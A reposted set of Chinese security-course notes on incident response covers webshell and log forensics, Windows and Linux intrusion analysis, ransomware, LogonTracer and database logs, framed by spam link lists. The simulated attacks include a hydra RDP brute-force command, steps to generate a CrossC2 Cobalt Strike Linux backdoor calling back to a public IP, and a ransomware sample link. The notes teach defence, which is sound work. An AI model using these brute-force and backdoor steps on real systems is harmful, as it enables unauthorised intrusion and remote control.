日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > windows >内容正文

windows

应急响应“小迪安全课堂笔记”web,系统,数据库三方应用

發布時間:2024/3/24 windows 52 豆豆
生活随笔 收集整理的這篇文章主要介紹了 应急响应“小迪安全课堂笔记”web,系统,数据库三方应用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

應急響應

  • 應急響應初識
    • WEB 攻擊應急響應朔源-后門,日志
    • WIN 系統攻擊應急響應朔源-后門,日志,流量
  • 應急響應-WEB 分析 php&javaweb&自動化工具
    • 應急響應流程
    • 必備知識點
    • 準備工作
    • 從表現預估入侵面及權限面進行排查
      • 有明確信息網站被入侵
      • 無明確信息網站被入侵
    • 常見分析方法:
    • Windows+IIS+Sql-日志,搜索
    • Linux+BT_Nginx+tp5-日志,后門
    • Linux+Javaweb+st2-日志,后門,時間
    • 360 星圖日志自動分析工具-演示,展望
  • 應急響應-win&linux系統 分析后門&勒索病毒&攻擊
    • 操作系統(windows,linux)應急響應:
    • 常見日志類別及存儲:
    • 補充資料:
    • 病毒分析
    • 病毒查殺
    • 病毒動態
    • 在線病毒掃描網站
    • 攻擊響應-暴力破解(RDP,SSH)-Win,Linux
      • windows-rdp
        • 演示
      • linux爆破-ssh
        • 演示
    • 控制響應-后門木馬(Webshell,PC)-Win,Linux
      • windows:默認配置測試
      • linux 借助 CrossC2 項目:netstat -ntulp
    • 危害響應-病毒感染(勒索 WannaCry)-Windows
    • 自動化響應檢測-Gscan 多重功能腳本測試-Linux
    • 涉及資源
  • 應急響應-第三方應用分析及應急取證
    • 必須知識點:
    • 案例
        • 系統日志-Win 日志自動神器 LogonTracer平臺-外網內網日志
          • LogonTracer平臺搭建使用演示
        • 應用分析-數據庫 Mysql&Mssql&Oracle 等日志分析-爆破注入操作
          • 演示
            • mysql
            • mssql
        • 模擬測試-自查漏洞模擬滲透測試尋找攻擊源頭-漏洞口令檢索
            • 系統漏洞自查win+linux
            • 服務漏洞自查win+linux
        • 專業要求-自動化 ir-rescue 應急響應取證工具箱-實時為您提供服務
      • 涉及資源

應急響應初識

WEB 攻擊應急響應朔源-后門,日志

故事回顧:某顧客反應??的?站首頁出現被篡改,請求支援 。
分析:涉及的攻擊面,涉及的操作權限,涉及的攻擊意圖(修改?站為了?嘛?,可以從修改的?站來分析) ,涉及的攻擊?式等 。
思路1:利??志定位修改時間基數,將前時間進?攻擊分析,后時間進?操作分析 。
思路2:利?后?webshell查殺腳本或?具找到對應后??件,定位第?時間分析。
webshell檢測工具:https://www.cnblogs.com/xiaozi/p/12679777.html

先查看開放的端?,再查看端?所對應的服務
netstat -ano

查看進程-與上圖進程號比對
tasklist /svc

通過任務管理器找到該進程的路徑

看到是由Apache搭建的,Apache有?志記錄
??被修改,??可能是index等地址

通過查看發現這個x.php很特殊,對應找到?站?錄

打開發現是?個后?
可以根據?具的指紋來發現是什么?具
后?查殺?具

WIN 系統攻擊應急響應朔源-后門,日志,流量

AppCompatCacheParser:https://github.com/EricZimmerman/AppCompatCacheParser/releases/
userassistview:https://www.onlinedown.net/soft/628964.htm

后?,病毒會占?資源
使用pchunter64工具


監管進程,標為藍?的為系統外連進程,屬于第三?
看到可以進程,但還是不能確定是??。可以分析,這個進程啟動后有什么操作,對外連接嗎?

查看?絡,發現有?絡連接,可以確定是??

userassisview工具,查看執行文件的記錄


檢查?件執?記錄,可以?來分析??的執?時間

再通過這個時間去查找?志前后

應急響應-WEB 分析 php&javaweb&自動化工具

應急響應流程

保護階段,分析階段,復現階段,修復階段,建議階段
目的:分析出攻擊時間,攻擊操作,攻擊后果,安全修復等并給出合理解決方案。
保護階段:直接斷網,保護現場,看是否能夠恢復數據。
分析階段:對入侵過程進行分析,常見方法為指紋庫搜索、日志分析、后門追查分析、漏洞檢查分析等。
復現階段:還原攻擊過程,模擬攻擊者入侵思路,關注攻擊者在系統中應用的漏洞、手法。
修復階段:分析原因后,修補相關系統、應用漏洞,如果存在后門或弱口令,及時清除并整改。
建議階段:對攻擊者利用的漏洞進行修補,加強系統安全同時提高安全意識。

必備知識點

1、熟悉常見的web安全攻擊技術
2、熟悉相關日志啟用以及存儲查看等
3、熟悉日志中記錄數據分類和分析等

準備工作

1.收集目標服務器各類信息
2.部署相關分析軟件及平臺等
3.整理相關安全滲透工具指紋庫
4.針對異常表現第一時間觸發思路

從表現預估入侵面及權限面進行排查

有明確信息網站被入侵

基于時間: 如果受害方提供了文件被修改日期、異常登錄日期,那么我們就可以鎖定這一時期的相關日志進行查看,不必去大海落枕一天天地看日志了。從而有針對性地對目標攻擊事件進行分析。
基于操作 : 如果受害方提供了被刪除、被加密的數據、文件位置,如數據庫、磁盤等,那么我們就可以根據攻擊者的操作判斷它入侵了哪些地方并可能分析出攻擊過程。
基于指紋 : 如果受害方只說網頁被修改、網站被上馬,那么我們就可以攻擊工具的指紋、木馬的指紋、病毒的指紋、修改的內容等判斷攻擊者使用了何種工具、處于何種技術水平。
基于其他

無明確信息網站被入侵

如果無明確信息的情況下,那么就需要排查全部可能入侵的手法:
1.WEB 漏洞-檢查源碼類別及漏洞情況
2.中間件漏洞-檢查對應版本及漏洞情況
3.第三方應用漏洞-檢查是否存在漏洞應用
4.操作系統層面漏洞-檢查是否存在系統漏洞
5.其他安全問題(口令,后門等)-檢查相關應用口令及后門掃描

常見分析方法:

指紋庫搜索,日志時間分析,后門追查分析,漏洞檢查分析等

Windows+IIS+Sql-日志,搜索

故事回顧:某小企業反應自己的網站出現異常,請求支援。
1、查詢IIS日志文件存放位置

2、根據網站的ID號尋找對應的日志


3、找到日志后查看攻擊語句

4、根據指紋或搜索關鍵字判斷攻擊所采用了何種攻擊

Linux+BT_Nginx+tp5-日志,后門

故事回顧:某黑x哥哥反應自己的網站出現異常,請求支援。

找到寶塔日志文件存放位置,并下載日志到本地


分析日志,產看工具指紋和攻擊請求ip,鎖定攻擊ip

寶塔自帶后門查殺

Linux+Javaweb+st2-日志,后門,時間

故事回顧

說明:apache tomcat日志,存在多種日志文件 access請求日志,catalina調用函數日志。
不同環境有不同日志記錄方式

根據攻擊時間鎖定日志

post請求可疑

這里使用fireseek工具


根據劇情信息-后門文件,查找日志


根據后門代碼搜索日志


360 星圖日志自動分析工具-演示,展望

https://www.cnblogs.com/xiaozi/p/12679777.html webshell檢測工具
https://www.cnblogs.com/xiaozi/p/13198071.html web日志安全分析工具

360星圖:只支持apache、iis、nginx,需配置conf

start.bat啟動


其他好用工具還有ELK、Splunk、FileSeek。其中ELK、Splunk部署比較麻煩

應急響應-win&linux系統 分析后門&勒索病毒&攻擊

操作系統(windows,linux)應急響應:

1.常見危害:
暴力破解:針對系統有包括rdp、ssh、telnet等,針對服務有包括mysql、ftp等,一般可以通過超級弱口令工具、hydra進行爆破。
漏洞利用:通過系統、服務的漏洞進行攻擊,如永恒之藍等。
流量攻擊:主要對目標機器進行dos攻擊,從而導致服務器癱瘓。
木馬控制(Webshell,PC 木馬等):主要分為webshell和PC木馬,webshell是存在與網站應用中的,而PC木馬是進入系統進行植入的。目的是對系統進行持久控制。
病毒感染(挖礦,蠕蟲,勒索等):主要分為挖礦病毒、蠕蟲病毒、勒索病毒等,對目標文件或目錄進行加密,用戶需要支付酬金給黑客。
2.常見分析:
計算機賬戶:賬戶異常、賬戶增加,看攻擊者是否留有后門賬戶。
端口:異常端口開放,看是否與外部地址的某個端口建立了鏈接。
進程:異常進程加載,看是否存在異常進程執行(排除系統正常進程)。
網絡:網絡連接異常,看是否對局域網內其他ip地址進行請求(橫向)或自身網絡異常。
啟動項:異常程序開機自啟動,看是否存在開機自啟動的程序,排查是否為惡意程序。
服務:異常服務添加、啟動,看機器上是否存在異常服務(排除系統正常服務)。
定時任務:異常定時任務執行,看機器上是否存在定時任務。
文件:異常文件,看機器上是否存在異常文件,如后門、病毒、木馬等。

常見日志類別及存儲:

Windows
時間查看器>window日志(包括應用程序、安全、Setup、系統、事件)。

linux
cd /var/log

補充資料:

先知應急響應大合集:https://xz.aliyun.com/t/485
https://www.secpulse.com/archives/114019.html
進程查看工具:https://docs.microsoft.com/en-us/sysinternals/

病毒分析

PCHunter:http://www.xuetr.com
火絨劍:https://www.huorong.cn
Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker:https://processhacker.sourceforge.io/downloads.php
autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL:https://www.bleepingcomputer.com/download/otl/
SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector

病毒查殺

卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
大蜘蛛:http://free.drweb.ru/download+cureit+free
火絨安全軟件:https://www.huorong.cn
360 殺毒:http://sd.360.cn/download_center.html

病毒動態

CVERC-國家計算機病毒應急處理中心:http://www.cverc.org.cn
微步在線威脅情報社區:https://x.threatbook.cn
火絨安全論壇:http://bbs.huorong.cn/forum-59-1.html
愛毒霸社區:http://bbs.duba.net
騰訊電腦管家:http://bbs.guanjia.qq.com/forum-2-1.html

在線病毒掃描網站

http://www.virscan.org //多引擎在線病毒掃描網
https://habo.qq.com //騰訊哈勃分析系統
https://virusscan.jotti.org //Jotti 惡意軟件掃描系統
http://www.scanvir.com //計算機病毒、手機病毒、可疑文件分析

攻擊響應-暴力破解(RDP,SSH)-Win,Linux

windows-rdp

Windows-LogFusion 載入查看:

事件歸類,事件 ID,事件狀態等,參考百度資料

演示

受害主機-win2012

通過kali模擬攻擊對rdp服務進行暴力破解

hydra -l mac -P /usr/share/wordlists/meta
sploit/password.lst rdp://172.16.54.42 -s
3389 -vV

1、手動查看RDP
在win系統中需開啟審核策略(成功、失敗),同時查看windows日志,關注事件歸類、事件ID、事件狀態等。


可以發現爆破賬戶為mac,黑客主機名為kali
2、Windows-LogFusion工具查看RDP

windows默認日志存儲路徑

打開(此工具可以遠程也可以本地),一般查看系統和安全日志即可。

模擬rdp弱口令攻擊

刷新

雙擊可看以下信息

發現登錄成功信息

根據這些登錄次數信息,可判定是爆破

linux爆破-ssh

Linux-grep 篩選:

1、統計了下日志,確認服務器遭受多少次暴力破解
grep -o “Failed password” /var/log/secure|uniq -c
2、輸出登錄爆破的第一行和最后一行,確認爆破時間范圍:
grep “Failed password” /var/log/secure|head -1
grep “Failed password” /var/log/secure|tail -1
3、進一步定位有哪些 IP 在爆破?
grep “Failed password” /var/log/secure|grep -E -o “(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)”|uniq -c | sort -nr
4、爆破用戶名字典都有哪些?
grep “Failed password” /var/log/secure|perl -e ‘while($_=<>){ /for(.*?) from/; print “$1\n”;}’|uniq -c|sort -nr
5、登錄成功的日期、用戶名、IP:
grep "Accepted " /var/log/secure | awk ‘{print $1,$2,$3,$9,$11}’
grep "Accepted " /var/log/secure | awk ‘{print $11}’ | sort | uniq -c | sort -nr | more

linux日志保存位置

登錄信息會記錄到secure文件中

演示

1、統計下日志,確認服務遭受多少次暴力破解
grep -o “Failed password” /var/log/secure|uniq -c

2、輸出登錄爆破的第一行和最后一行,確認爆破時間范圍
grep “Failed password” /var/log/secure|head -1
grep “Failed password” /var/log/secure|tail -1

3、進一步定位有哪些IP在爆破
grep “Failed password” /var/log/secure|grep -E -o “(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)”|uniq -c | sort -nr

4、爆破用戶名字典都有哪些?
grep “Failed password” /var/log/secure|perl -e ‘while($_=<>){ /for(.*?) from/; print “$1\n”;}’|uniq -c|sort -nr

5、登錄成功的日期、用戶名、IP:
grep "Accepted " /var/log/secure | awk ‘{print $1,$2,$3,$9,$11}’
grep "Accepted " /var/log/secure | awk ‘{print $11}’ | sort | uniq -c | sort -nr | more

控制響應-后門木馬(Webshell,PC)-Win,Linux

windows:默認配置測試

注:利用工具木馬篩選時,windows高版本網絡信息獲取不全(2012及以上)
方式一:借助殺毒軟件
方式二:windows工具(非殺軟)
測試環境:阿里云服務器,已拿到權限,上傳運行cs了后門,已上線。

tcpview工具,win官方,下載地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
此工具主要功能是查看當前運行的進程是否有外連。不過這個工具看不全進程,只能看到一部分。


procexp 同樣win官方進程分析工具-推薦使用

PChunter,網絡上的集成化工具,繼承了win官方工具的功能。火絨劍和這個類似。-推薦
藍色進程代表第三方應用進程。

有些木馬病毒會隱藏,通過這款工具也可以看到

當找到可以信息不確定時,可以使用win官方工具userassisview工具 ,它可以查看win操作文件全部記錄
就可以判斷當前時間有沒有被執行過。

logonsessions工具可查看服務器被那些用戶連接過。這個信息也可以在日志當中分析到。

autoruns工具win官方,查看win啟動的項目,可以篩選可疑的服務名計劃任務和啟動項。

linux 借助 CrossC2 項目:netstat -ntulp

生成linux木馬項目:
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
cs配合CrossC2上線linux參考過程:http://www.adminxe.com/1287.html
1.項目上傳至服務端目錄,給予執行權限
2.配置監聽器:
windows/beacon_https/reverse_https 阿里云記得端口放行

3.生成后門:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2

運行生成的木馬文件,linux上線了

通過工具及日志分析或執行記錄查找后門問題 ——linux詳見自動化響應檢測-Gscan 多重功能腳本測試-Linux

危害響應-病毒感染(勒索 WannaCry)-Windows

勒索只針對windows
詳細說明中毒表現及恢復指南
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html

永恒之藍樣本(勒索病毒):https://bbs.pediy.com/thread-217586-1.htm
勒索樣本:https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取碼:xiao

這里用虛擬機演示,此虛擬機感染勒索病毒

所有文件都被加密

解決方法:
1、各種解密工具
2、花錢解密
解密成功概率都不大

為什么會中毒?
1、基于漏洞,系統沒有打補丁。
2、瞎b下載。

自動化響應檢測-Gscan 多重功能腳本測試-Linux

地址:https://github.com/grayddq/GScan/

執行,自動檢測腳本


查看端口和進程,定位木馬

若采取人工的方式的話就直接鏈接服務器,查找日志文件,通過各種類日志篩選可疑信息。

涉及資源

https://xz.aliyun.com/t/485
https://lesuobingdu.360.cn/
https://github.com/gloxec/CrossC2/
https://github.com/darkr4y/geacon/
https://github.com/grayddq/GScan/
https://bbs.pediy.com/thread-217586-1.htm
https://www.nomoreransom.org/zh/index.html
https://docs.microsoft.com/en-us/sysinternals/
https://www.secpulse.com/archives/114019.html
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取碼xiao

應急響應-第三方應用分析及應急取證

必須知識點:

1.第三方應用由于是選擇性安裝,如何做好信息收集和漏洞探針也是獲取攻擊者思路的重要操作,除去本身漏洞外,提前預知或口令相關攻擊也要進行篩選。
2.排除三方應用攻擊行為,自查漏洞分析攻擊者思路,人工配合工具腳本。
3.由于工具或腳本更新迭代快,分類復雜,打造自己的工具箱迫在眉睫。

案例

系統日志-Win 日志自動神器 LogonTracer平臺-外網內網日志

如何安裝使用:https://github.com/JPCERTCC/LogonTracer/wiki/

linux 安裝使用筆記:阿里云主機記得開放端口及關閉防火墻
1.下載并解壓 neo4j:tar -zvxf neo4j-community-4.2.1-unix.tar
2.安裝 java11 環境:sudo yum install java-11-openjdk -y
3.修改 neo4j 配置保證外部訪問:
dbms.connector.bolt.listen_address=0.0.0.0:7687
dbms.connector.http.listen_address=0.0.0.0:7474
./bin/neo4j console &
4.下載 LogonTracer 并安裝庫:
git clone https://github.com/JPCERTCC/LogonTracer.git
pip3 install -r requirements.txt
5.啟動 LogonTracer 并導入日志文件分析
python3 logontracer.py -r -o [PORT] -u [USERNAME] -p [PASSWORD] -s [IP 地址]
python3 logontracer.py -r -o 8080 -u neo4j -p xiaodi -s 47.98.99.126
python3 logontracer.py -e [EVTX 文件] -z [時區] -u [用戶名] -p [密碼] -s [IP 地址]
python3 logontracer.py -e Security.evtx -z -13 -u neo4j -p xiaodi -s 127.0.0.1
6.刷新訪問 LogonTracer-web_gui 查看分析結果

LogonTracer平臺搭建使用演示

1、下載:git clone https://github.com/neo4j/neo4j tar -zvxf neo4j-community-4.2.1-unix.tar

2、安裝java11環境
sudo yum install java-11-openjdk -y
3、修改neo4j配置保證外部訪問
dbms.connector.bolt.listen_address=0.0.0.0:7687
4、開啟neo4j
./bin/neo4j console &

5、下載Logontracer并安裝庫
git clone https://github.com/JPCERTCC/Log onTracer.git
pip3 install -r requirements.txt

6、啟動Logontracer并導入日志分析文件
python3 logontracer.py -r -o [PORT] -u [U SERNAME] -p [PASSWORD] -s [IP ]
python3 logontracer.py -r -o 8080 -u neo4 j -p xiaodi -s 47.98.99.126

python3 logontracer.py -e [EVTX ] -z [] -u [] -p [] -s [IP ]
python3 logontracer.py -e Security.evtx -z -13 -u neo4j -p xiaodi -s 127.0.0.1

7、刷新訪問LogonTracer-web_gui,查看分析結果

應用分析-數據庫 Mysql&Mssql&Oracle 等日志分析-爆破注入操作

常見的數據庫攻擊包括弱口令、SQL 注入、提升權限、竊取備份等。對數據庫日志進行分析,可以發現攻擊行為,進一步還原攻擊場景及追溯攻擊源。
Mysql:啟用,記錄,分析(分析 SQL 注入及口令登錄爆破等)
show variables like ‘%general%’;
SET GLOBAL general_log = ‘On’;
SET GLOBAL general_log_file = ‘/var/lib/mysql/mysql.log’;
Mssql:查看,跟蹤,分析(配置跟蹤可分析操作,查看日志可分析登錄等)

演示
mysql

1、日志啟用并查看

show variables like"%gengeral"; SETGLOBAL general_log ='On'; # mysql SET GLABAL general_log_file ='/var/lib/m ysql/mysql.log'


2、通過超級弱口令工具(snetcraker)對目標進行爆破模擬攻擊

3、查看日志并分析

mssql

1、查看日志

2、配置跟蹤文件

3、對mssql進行攻擊并實時查看日志

模擬測試-自查漏洞模擬滲透測試尋找攻擊源頭-漏洞口令檢索

主要針對兩種情況:
1.日志被刪除或沒價值信息
2.沒有思路進行分析可以采用模擬滲透

1.windows,linux 系統漏洞自查:
WindowsVulnScan,linux-exploit-suggester
D:\Myproject\venv\Scripts\python.exe cve-check.py -C -f KB.json
./linux-exploit-suggester.sh
2.windows,linux 服務漏洞自查:
windows:Get-WmiObject -class Win32_Product
linux:LinEnum.sh
searchsploit weblogic
利用前期信息收集配合 searchsploit 進行應用服務協議等漏洞檢索
3.windows,linux 協議弱口令自查-工具探針或人工獲取判斷-snetcraker

系統漏洞自查win+linux

主要工具是WindowsVulnScan,linux-exploit-suggester
windows
D:\Myproject\venv\Scripts\python.exe cve-check.py -C -f KB.json
如果出現報錯,將KB.json切換為utf-8模式

linux
./linux-exploit-suggester.sh

工具地址:
https://github.com/chroblert/WindowsVulnScan
https://github.com/mzet-/linux-exploit-suggester

服務漏洞自查win+linux

windows
Get-WmiObject -class Win32_Product

Linux
https://github.com/rebootuser/LinEnum
./LinEnum.sh

根據檢索出來的服務進行漏洞掃描
主要使用searchsploit,比如weblogic
searchsploit weblogic

其中查詢的漏洞分別為dos,local,remote,webapps

專業要求-自動化 ir-rescue 應急響應取證工具箱-實時為您提供服務

https://github.com/diogo-fernan/ir-rescue
分析腳本工具原理,嘗試自己進行編寫修改,成為自己的工具箱殺器。


主要用于下載各種應急響應工具,打造自己的應急工具箱。

涉及資源

https://github.com/rebootuser/LinEnum
https://github.com/diogo-fernan/ir-rescue
https://github.com/offensive-security/exploitdb
https://github.com/chroblert/WindowsVulnScan
https://github.com/JPCERTCC/LogonTracer.git
https://github.com/mzet-/linux-exploit-suggester
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取碼:xiao

總結

以上是生活随笔為你收集整理的应急响应“小迪安全课堂笔记”web,系统,数据库三方应用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 亚洲va在线∨a天堂va欧美va | 欧美一区二区在线播放 | 亚洲精品一二三四区 | 亚洲爆乳无码一区二区三区 | 中文字幕777 | 麻豆影视国产在线观看 | 亚洲图片一区 | 少妇爽| 男人添女人囗交视频 | 久久视频在线 | 韩国三级bd高清中字2021 | 欧美无遮挡 | 欧美日韩国产一级片 | 日韩中文字幕第一页 | 亚洲aa | 毛片毛片毛片毛片毛片 | 在线黄色免费网站 | 日韩激情小视频 | 亚洲综合小说 | 无码h黄肉3d动漫在线观看 | 加勒比hezyo黑人专区 | 夜夜嗨一区二区三区 | 亚瑟av在线 | 欧美自拍在线 | 国产一级片播放 | 成人小片 | 国产精品宾馆在线 | 日韩精品一区二区在线 | free性欧美hd另类 | 日本人妻丰满熟妇久久久久久 | 亚洲福利影视 | 呦呦网 | 人人爱人人| 欧美精品亚洲精品日韩精品 | 国产精品人成在线观看免费 | 91久久精品一区 | 亚洲亚洲人成综合网络 | 国内黄色一级片 | 国产精品久久麻豆 | 久久久久一区 | 欧美另类一区二区 | 西西大胆午夜视频 | 国产无码精品久久久 | 欧美综合一区二区三区 | 亚洲色吧 | 日韩欧美高清一区 | 女女互慰吃奶互揉调教捆绑 | 少妇特黄一区二区三区 | 国产猛男猛女超爽免费视频 | 密臀av| 国产一区二区视频免费在线观看 | 污污小说在线观看 | 大号bbwassbigav女 | 四虎伊人 | 99热这里有精品 | aaa在线视频 | 国产亚洲一区二区在线 | 福利资源在线观看 | 成年人福利| 午夜av一区二区三区 | 黄色www视频 | 免费黄色片网站 | 久久久久久久精 | 日本福利一区二区三区 | xxx国产 | 台湾综合色 | 在线中文字幕网站 | 日韩专区一区 | 亚洲中文字幕无码av | 日韩视频中文字幕 | 日b免费视频| 国模私拍在线 | 日本欧美国产一区二区三区 | 五月六月婷婷 | 国产三极片 | 亚洲黄色a| 国产98在线 | 99视频导航| 丰满护士巨好爽好大乳 | 在线你懂的视频 | 毛片999 | 亚洲国产精品尤物yw在线观看 | 视频一区二区三 | 草逼导航 | 欧美一区二区三区在线播放 | 天天综合一区 | 自拍日韩亚洲一区在线 | 午夜淫片| 国产嫩草影视 | 成长快手短视频在线观看 | 少妇高潮一区二区三区69 | 亚洲天堂成人av | 91国产在线免费观看 | 色婷婷综合久久久久中文一区二区 | 亚洲国产婷婷香蕉久久久久久99 | 欧美人性生活视频 | 天堂免费在线视频 | 好屌妞视频这里只有精品 | 69xxx中国|